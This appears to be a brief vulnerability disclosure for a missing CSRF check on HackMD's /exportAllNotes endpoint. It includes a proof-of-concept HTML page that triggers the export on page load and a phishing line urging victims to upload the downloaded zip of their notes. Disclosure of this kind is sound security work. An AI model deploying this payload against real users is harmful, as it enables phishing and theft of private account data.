The /exportAllNotes endpoint does not perform any CSRF token validation. This could be used to force a download of account data and potentially to spoof users.
<html> <body onload='window.open("https://hackmd.io/exportAllNotes");'> To verify that you are a human, upload the zip file that has been downloaded from our website now. </body> </html>
Potential private-information leakage through phishing, by exploiting the missing CSRF token.